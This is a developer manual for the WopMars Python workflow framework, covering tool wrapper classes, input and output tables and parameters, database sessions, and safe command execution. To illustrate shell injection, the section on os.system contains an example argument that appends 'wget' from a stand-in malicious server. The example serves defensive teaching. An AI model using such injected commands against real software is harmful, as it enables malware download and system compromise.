The Tool Wrappers

This manual aims to explain in simple words how to write tool wrappers, so that a new Python developer can configure their own analysis workflow. It often refers to the Wopfile, so I recommend keeping the Wopfile section open in case you get lost.

This starting guide will help you understand the main mechanisms that govern WopMars, that is, the way WopMars talks with the tool wrappers you are using in order to understand their role in the workflow in terms of input and output parameters.

To illustrate the conditions necessary to build a correct Toolwrapper, we will use a kind of to-do list so that no step is forgotten. The order doesn’t matter but, I insist, each step is essential.

Developing basic tool wrappers

Declaring your class

To define a Toolwrapper, we will use an important concept of Object-Oriented Programming (OOP): abstract inheritance.

Note

An abstract class is a class which represents a concept and which, consequently, is not supposed to be instantiated. Take the bird concept: a bird flies and sings, so an abstract class Bird would have methods like fly and sing with nothing inside. There is no species called “bird”; however, there are ducks and eagles. A duck is a realization of the concept of “bird”. In OOP, the class Duck would inherit from Bird and would override the methods fly and sing to specialize them so that they fit the duck’s characteristics. Here, Duck is a subclass of Bird.
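The bird example can be sketched with Python's standard abc module. This is only an illustration of the concept; it does not show how the ToolWrapper class itself is implemented, and the strings returned by the methods are made up for the example.

```python
from abc import ABC, abstractmethod


class Bird(ABC):
    """Abstract concept: declares what every bird can do."""

    @abstractmethod
    def fly(self):
        """Return a description of how the bird flies."""

    @abstractmethod
    def sing(self):
        """Return the sound the bird makes."""


class Duck(Bird):
    """Concrete realization of the Bird concept."""

    def fly(self):
        return "flaps low over the pond"

    def sing(self):
        return "quack"


duck = Duck()
print(duck.sing())

try:
    Bird()  # an abstract class cannot be instantiated
except TypeError as error:
    print("Cannot instantiate Bird:", error)
```

A subclass that forgets to override fly or sing would fail in the same way as Bird when instantiated, which is the kind of guarantee abstract inheritance is meant to give.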

A Toolwrapper compatible with WopMars has to be a subclass of the abstract class, prepare yourself, ToolWrapper! For WopMars, every Toolwrapper is a subclass of ToolWrapper and if you ask it to work with a class which does not satisfy this simple condition, you’ll obtain an error. The reason is simple: if your Toolwrapper inherits from ToolWrapper, then it is certain to contain the methods and attributes familiar to WopMars. Otherwise, there are no guarantees.

Another important thing necessary to work with WopMars is to provide the static class attribute __mapper_args__ to your Toolwrapper. This attribute is a dictionary which should have polymorphic_identity as key and the full name of the class (contained in a String) as value. WopMars needs this information because, when it stores the tool wrapper information in the database, it has to keep track of the inheritance between your Toolwrapper and the ToolWrapper class.

Note

A static class attribute is an attribute associated with a class and not with a specific object of this class. Modifying this kind of attribute on the class is similar to modifying it in every object of the class (those that already exist and those created later).
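A minimal sketch of this behavior in plain Python follows. The class Wrapper and the attribute registry_name are hypothetical names chosen for the illustration. It also shows a Python subtlety: assigning the attribute through one object creates an attribute on that object only and leaves the class attribute untouched.

```python
class Wrapper:
    # Class attribute: stored once on the class, shared by all instances
    registry_name = "default"


first = Wrapper()
second = Wrapper()

# Changing the attribute on the class is visible from every instance
Wrapper.registry_name = "shared"
print(first.registry_name, second.registry_name)

# Assigning through one instance creates an attribute on that instance only
first.registry_name = "mine"
print(first.registry_name, second.registry_name, Wrapper.registry_name)
```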

Here is an example of the declaration of a class called SparePartsManufacturer:

from wopmars.models.ToolWrapper import ToolWrapper


class SparePartsManufacturer(ToolWrapper):
    __mapper_args__ = {
        "polymorphic_identity": __module__
    }
    pass

You have now created your first Toolwrapper, but the aim of using abstract class inheritance is to guarantee to WopMars that each Toolwrapper implements some methods which describe its role.

Toolwrapper specifying methods

A good way to see a Toolwrapper is as an independent piece of software, meaning that it has a well-defined role: generating a specific output from a specific kind of input, with some options to parametrize its behavior. Anyway, this is the way WopMars “looks at” the tool wrappers. The link between a Toolwrapper and WopMars is made through methods inherited from ToolWrapper, which have to be rewritten by the Toolwrapper developer.

Describing files: specify_input_file and specify_output_file

The files called input files and output files are, on the one hand, the files necessary for the tool to work and, on the other hand, the files generated by the tool. A Toolwrapper doesn’t rely on a specific file on the machine: it shouldn’t access a file in a hard-coded way but should use a variable containing the path to the given file. It is up to the Toolwrapper developer to specify those variable names, and they have to be respected in the workflow definition file (see Wopfile section). Those variable names are known by WopMars thanks to the methods specify_input_file (for the variable names associated with inputs) and specify_output_file (for the variable names associated with outputs). Each of those methods has to return a list of Strings containing the variable names accepted by the Toolwrapper.

Warning

Every file asked for by a Toolwrapper is required. It means that the processing of the Toolwrapper relies on every input and output asked for. If a file is optional, you should specify it in the method specify_params (we will see it later).

The class SparePartsManufacturer takes one input file but doesn’t produce any output file. The input file path will be contained in the field named “pieces”.

class SparePartsManufacturer(ToolWrapper):
    __mapper_args__ = {
        "polymorphic_identity": __module__
    }

    def specify_input_file(self):
        return ["pieces"]
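To make the link with the definition file concrete, here is a small sketch of the kind of comparison that can be made between the names returned by specify_input_file and the keys written in a rule. The helper check_file_names is hypothetical and is not part of WopMars; the sketch assumes that both missing and unknown names count as errors.

```python
def check_file_names(declared, provided):
    """Compare names declared by a wrapper with the keys given in a rule.

    Hypothetical helper, not part of WopMars: returns a tuple
    (missing, unexpected) of sorted name lists.
    """
    declared_set, provided_set = set(declared), set(provided)
    missing = sorted(declared_set - provided_set)
    unexpected = sorted(provided_set - declared_set)
    return missing, unexpected


# Names returned by SparePartsManufacturer.specify_input_file()
declared_inputs = ["pieces"]

# Keys of the "file" part of the rule input in the definition file
rule_input_files = {"pieces": "input/pieces.txt"}
print(check_file_names(declared_inputs, rule_input_files))

# A misspelled key is reported as both a missing and an unexpected name
print(check_file_names(declared_inputs, {"piece": "input/pieces.txt"}))
```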

Describing tables: specify_input_table and specify_output_table

WopMars makes its Toolwrapper able to read and write entries in a database. As for the files, the tool wrappers have to specify which tables of the database they will read (input tables) and which they will write to (output tables). So, the Toolwrapper class implements the methods specify_input_table and specify_output_table. However, this time, the Strings contained in the returned list are associated with both the variables containing the table models and the names of the tables themselves.

The final user has to write the same table names as keys in the table part of the definition file (see Wopfile section), with the paths to the models associated with those tables as values, to specify which model the Toolwrapper should use. Usually, a Toolwrapper is closely related to a specific model, but we can imagine that if two models are similar for a given Toolwrapper, it could use one or the other interchangeably (for example, if a model B inherits from the model A, then every Toolwrapper able to use A should be able to use B too).

Note

At the moment, the concept of model may not be clear, but don’t worry: the section concerning the models gives more explanations. For now, simply note that the Toolwrapper communicates its input and output table names through the methods specify_input_table and specify_output_table.

Here is the rest of the Toolwrapper SparePartsManufacturer which writes its results in the table piece:

class SparePartsManufacturer(ToolWrapper):
    __mapper_args__ = {
        "polymorphic_identity": __module__
    }

    def specify_input_file(self):
        return ["pieces"]

    def specify_output_table(self):
        return ["piece"]

Describing parameters: specify_params

Another feature offered by the tool wrappers is the ability to specify parameters for the processing of the wrapper. Usually, those parameters are associated with the options of the analysis tool itself. They may also correspond to options used by the tool wrappers to offer flexibility for the pre- and post-processing of the data.

To specify which options a Toolwrapper is able to understand, it implements the method specify_params. This method returns a dictionary in which each key corresponds to the name of an option, as it will be used in the definition file (see Wopfile section), and each value is a String representing its type. The available types are the following (to memorize them, just think about the Python data types):

  • int
  • float
  • str
  • bool

Furthermore, the keyword required is available and specifies that an option has to be given by the user for the tool to run. To specify the type and use required at the same time, the character | is used as a delimiter inside the String.

In the following class, the parameter max_price is an int and will be used to get only the entries with a price lower than it, if set.

class SparePartsManufacturer(ToolWrapper):
    __mapper_args__ = {
        "polymorphic_identity": __module__
    }

    def specify_input_file(self):
        return ["pieces"]

    def specify_output_table(self):
        return ["piece"]

    def specify_params(self):
        return {
            "max_price": "int"
        }
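The type Strings described above can be read as a small mini-language. The following sketch shows one possible way to interpret them. It is not the WopMars implementation: the function parse_param_spec is hypothetical, and the exact spelling "required|int" (keyword first, then type) is an assumption, so the parser accepts both orders.

```python
# Hypothetical helper, not the WopMars implementation
TYPES = {"int": int, "float": float, "str": str, "bool": bool}


def parse_param_spec(spec):
    """Split a spec such as "required|int" into (required, python_type)."""
    tokens = [token.strip() for token in spec.split("|")]
    required = "required" in tokens
    type_names = [token for token in tokens if token != "required"]
    # Exactly one known type name is expected next to the optional keyword
    if len(type_names) != 1 or type_names[0] not in TYPES:
        raise ValueError("Unsupported parameter specification: %r" % spec)
    return required, TYPES[type_names[0]]


print(parse_param_spec("int"))
print(parse_param_spec("required|int"))
```

With such a reading, "max_price": "int" describes an optional integer option, whereas "max_price": "required|int" would make the rule invalid when max_price is absent from the definition file.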

Declaring the method run

The run method contains the core of your Toolwrapper. The data processing and the call to the underlying analysis tool will be done here.

Calling files: self.input_file and self.output_file

The paths to the files given by the final user are retrieved with the methods self.input_file and self.output_file, which take the name of the variable containing the desired file as argument. For example, in our definition file, we have:

rule Rule1:
    tool: 'wrapper.SparePartsManufacturer'
    input:
        file:
            pieces: 'input/pieces.txt'

We can access the string input/pieces.txt with the following statement:

self.input_file("pieces")

Calling models: self.input_table and self.output_table

The models given by the user can be accessed with the methods self.input_table and self.output_table, with the table name as argument. This way, and unlike the files, you won’t get the string representing the model but the model itself. For example:

output:
    table:
        piece: 'model.Piece'

We can access the model Piece with the following statement:

self.output_table("piece")

Session and accessing the database

If you are using WopMars, it is probably for the database access. You now know how to get the models from your run method, but you probably don’t know what to do with them. This section aims to explain how you should use your models and a session to access the database.

Note

When you are working with databases, there are three levels of hierarchy in the work you perform: the session, the transaction and the operation:

  • The operation corresponds to each single task you ask the database to do (SELECT, INSERT, UPDATE, DELETE, etc.)
  • The transaction is a series of closely related operations (for example: SELECT, compute, then INSERT). When a transaction finishes, the state of the database is checked: if everything seems right and well ordered, the transaction is validated (COMMIT); if not, the whole transaction is canceled (ROLLBACK) in order to return to a stable state.
  • The session is a series of independent transactions. In other words, when you want to work with the database, you open a session and it says “I’m gonna work with you, database, are you ok?”. Then, every operation you perform is associated with your session before being committed or rolled back.
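These three levels can be observed with Python's standard sqlite3 module. In this sketch, which does not use WopMars, the connection loosely plays the role of the session; the table layout and the values are hypothetical.

```python
import sqlite3

# In-memory database used only for this illustration
connection = sqlite3.connect(":memory:")
connection.execute("CREATE TABLE piece (serial_number TEXT PRIMARY KEY, price INTEGER)")
connection.commit()

# First transaction: two related operations, validated together
connection.execute("INSERT INTO piece VALUES ('A1', 600)")
connection.execute("INSERT INTO piece VALUES ('B2', 700)")
connection.commit()

# Second transaction: the second INSERT violates the primary key,
# so the whole transaction is canceled, including the insertion of 'C3'
try:
    connection.execute("INSERT INTO piece VALUES ('C3', 800)")
    connection.execute("INSERT INTO piece VALUES ('A1', 900)")
    connection.commit()
except sqlite3.IntegrityError:
    connection.rollback()

count = connection.execute("SELECT COUNT(*) FROM piece").fetchone()[0]
print(count)
```

Only the two rows of the first transaction remain in the table, because the rollback returned the database to its last stable state.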

Developing Advanced tool wrappers

Now that you understand the basics of the development of the tool wrappers you may want to do more advanced tricks to deal with WopMars.

Parametrize inputs and outputs

During the parsing of the configuration file, WopMars first checks the validity of the parameters and then looks at the inputs and outputs. This behavior allows you to make the inputs and outputs of your Toolwrapper depend on the parameters used. In this example, the parameter to_file is a boolean and, if it is True, the result is written to a file instead of the database.

class CarAssembler(ToolWrapper):
    __mapper_args__ = {
        "polymorphic_identity": __module__
    }

    def specify_output_file(self):
        if not self.option("to_file"):
            return []
        else:
            return ["piece_car"]

    def specify_input_table(self):
        return ["piece"]

    def specify_output_table(self):
        if self.option("to_file"):
            return []
        else:
            return ["piece_car"]

    def specify_params(self):
        return {
            "to_file": "bool",
            "max_price": "int",
        }

And here, the definition file (Wopfile2.yml in the example directory) looks like this:

# Rule1 uses SparePartsManufacturer to insert piece information into the table piece
rule Rule1:
    tool: 'wrapper.SparePartsManufacturer'
    input:
        file:
            pieces: 'input/pieces.txt'
    output:
        table:
            piece: 'model.Piece'

# CarAssembler makes all possible combinations of pieces to build cars and calculates the final price
rule Rule2:
    tool: 'wrapper.CarAssembler'
    input:
        table:
            piece: 'model.Piece'
    output:
        # Here the output is written in a file
        file:
            piece_car: 'output/piece_car.txt'
    params:
        # The price has to be under 2000!
        max_price: 2000
        to_file: True

Inherit models

During the design of your workflows, you may want several rules to write to the same table in a specific order (for example, one rule creates entries and another adds information to the fields). You could proceed as usual, playing with inputs and outputs to fit your needs, but you would then be stuck with a logic problem: WopMars won’t be able to say “this rule should be run before this one”, as in the following schema:

[Figure: model_inheritance.png]

If you want the rules to run in this specific order, WopMars cannot tell from the table names alone whether rule 2 is supposed to run before rule 4.

You can bypass this issue using model inheritance: you can build a model which inherits from an existing model and adds new attributes to it.

Going back to our example model Piece, we need another model which adds the field date to the table. We call this model DatedPiece:

from sqlalchemy.sql.sqltypes import Date
from sqlalchemy import Column

from model.Piece import Piece


class DatedPiece(Piece):
    date = Column(Date)

Along with this model, the example provides another Toolwrapper, AddDateToPiece, which shows how to use the same table as input and output. Note that only output_table is used in the run method, because we are only interested in DatedPiece objects:

import time, datetime
import random

from wopmars.models.ToolWrapper import ToolWrapper


class AddDateToPiece(ToolWrapper):
    __mapper_args__ = {
        "polymorphic_identity": __module__
    }

    def specify_input_table(self):
        return ["piece"]

    def specify_output_table(self):
        return ["piece"]

    def run(self):
        session = self.session
        DatedPiece = self.output_table("piece")

        for p in self.session.query(DatedPiece).all():
            date = datetime.datetime.fromtimestamp(time.time() - random.randint(1000000, 100000000))
            p.date = date
            session.add(p)
        session.commit()

Executing clean command line

While learning Python, you may have encountered the famous os.system("command-line") and you probably want to use it again. Sorry, you shouldn’t do things this way, especially if you are running long-running analysis software. Instead, I’ll show you how to use the module subprocess for simple things and, please, use it extensively in order to get more control over the command lines you are executing.

Note

As far as I know, there are two main differences between os.system() and subprocess, besides the fact that subprocess is a little more difficult to use:

  • os.system() is very vulnerable to malicious code injection. Example:

    def list_extension(ext):
        os.system("ls -1 *." + str(ext))
    

    This function is supposed to list all the files of a given extension in the directory. But if, instead of passing txt as argument, I pass txt; wget http://malicious.server/malware then, the function will list the files with txt extension and download the malware from the malicious server!

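    Now, with subprocess.Popen and a list of arguments, such an injection does not work. No shell is involved, so the whole value of ext, including the ; and the spaces, reaches ls as part of a single argument and is never interpreted as a second command (for the same reason, the * wildcard is not expanded by a shell either):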

    def list_extension(ext):
        subprocess.Popen(["ls", "-1", "*." + str(ext)])
    
  • subprocess opens a pipe between the Python process and the subprocess, whereas os.system calls a subshell independent of the first. This makes communication between the subprocess and your Python code far easier with subprocess than with os.system, where it is nearly impossible.
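Both points can be tried out with the following sketch, which uses only the standard library (Python 3.7 or later for capture_output). The function names are chosen for the illustration. Since no shell expands wildcards when the command is given as a list, list_extension relies on the glob module instead of ls, and echo_argument starts a child Python process only to show that a suspicious string arrives as one plain argument and that its output can be read back through a pipe.

```python
import glob
import os
import subprocess
import sys


def list_extension(ext, directory="."):
    """List the files with a given extension; no shell is involved."""
    pattern = os.path.join(glob.escape(directory), "*." + glob.escape(str(ext)))
    return sorted(os.path.basename(path) for path in glob.glob(pattern))


def echo_argument(arg):
    """Start a child Python process that prints its first argument."""
    completed = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", arg],
        capture_output=True,  # collect stdout and stderr through pipes
        text=True,            # decode the output as str instead of bytes
        check=True,           # raise CalledProcessError on a non-zero exit code
    )
    return completed.stdout.strip()


# The whole string reaches the child as one argument; nothing after ";" is run
print(echo_argument("txt; echo injected"))
```

The check=True argument is a design choice worth keeping for analysis tools: a failing command raises an exception instead of letting the workflow continue silently.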

Reading/writing to the database

Reading and writing to the database has to be carried out through the WopMars session. The WopMars session implements a lock system to prevent database inconsistencies. There are three implemented methods to read/write to the database with the WopMars session.

  • SQLAlchemy ORM
  • SQLAlchemy core
  • Pandas read_sql and to_sql

SQLAlchemy ORM

The SQLAlchemy ORM is very simple but it is also quite slow beyond 100 objects. Inside the run method of the tool wrapper, we can get a WopMars session simply with self.session and then call SQLAlchemy ORM methods on it.

# This code is for illustration purposes and has not been tested
# inside the run method of a tool wrapper MyWrapper
from sqlalchemy.orm.exc import NoResultFound

def run(self):
    session = self.session
    my_input_model = self.output_table(MyWrapper.__input_table1)
    # value_1 and value_2 stand for the values to look up
    query_dic = {'col1': value_1, 'col2': value_2}
    try:  # check if a row matching query_dic already exists
        session.query(my_input_model).filter_by(**query_dic).one()
    except NoResultFound:  # if not, add it and commit later
        new_instance = my_input_model(**query_dic)
        session.add(new_instance)
    session.commit()

SQLAlchemy core

Inside the run method of the tool wrapper, we first retrieve a list of object dictionaries from the database. Then we check that the new objects are not already in the database and insert a list of such object dictionaries.

# This code is for illustration purposes and has not been tested
# inside the run method of a tool wrapper MyWrapper
from sqlalchemy import select

def run(self):
    session = self.session
    engine = session._WopMarsSession__session.bind
    conn = engine.connect()
    my_input_model = self.output_table(MyWrapper.__input_table1)
    # retrieve the col1 values of all objects already in the database
    sql = select([my_input_model.col1])
    my_input_model_in_db = [{'col1': row[0]} for row in conn.execute(sql)]
    # collect the new value dics that are not already in the database
    # (val1 stands for the value to insert)
    my_input_model_new_objects = []
    if {'col1': val1} not in my_input_model_in_db:
        my_input_model_new_objects.append({'col1': val1})
    # bulk insert the list of value dics, if there is anything to insert
    if my_input_model_new_objects:
        engine.execute(my_input_model.__table__.insert(), my_input_model_new_objects)
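
Pandas read_sql and to_sql

The third approach listed above is not illustrated in this section, so here is a minimal sketch of the two pandas calls it relies on. It runs against a stand-alone in-memory SQLite connection, which means that it bypasses the WopMars session and its lock system; how the connection should be obtained inside a tool wrapper is not covered here (presumably an engine retrieved as in the SQLAlchemy core example could be passed instead, but that is an assumption). The table layout and the values are hypothetical.

```python
import sqlite3

import pandas as pd

# Stand-in for the workflow database; the table layout is hypothetical
connection = sqlite3.connect(":memory:")
connection.execute("CREATE TABLE piece (serial_number TEXT, price INTEGER)")

# Write: append the rows of a DataFrame to the table
new_pieces = pd.DataFrame(
    {"serial_number": ["A1", "B2", "C3"], "price": [600, 2500, 1200]}
)
new_pieces.to_sql("piece", connection, if_exists="append", index=False)

# Read: load the result of a query into a DataFrame
cheap_pieces = pd.read_sql(
    "SELECT serial_number, price FROM piece WHERE price < ? ORDER BY price",
    connection,
    params=(2000,),
)
print(cheap_pieces)
```

Using if_exists="append" keeps the existing table and its rows; the other accepted values, "fail" and "replace", would respectively raise an error or drop the table first.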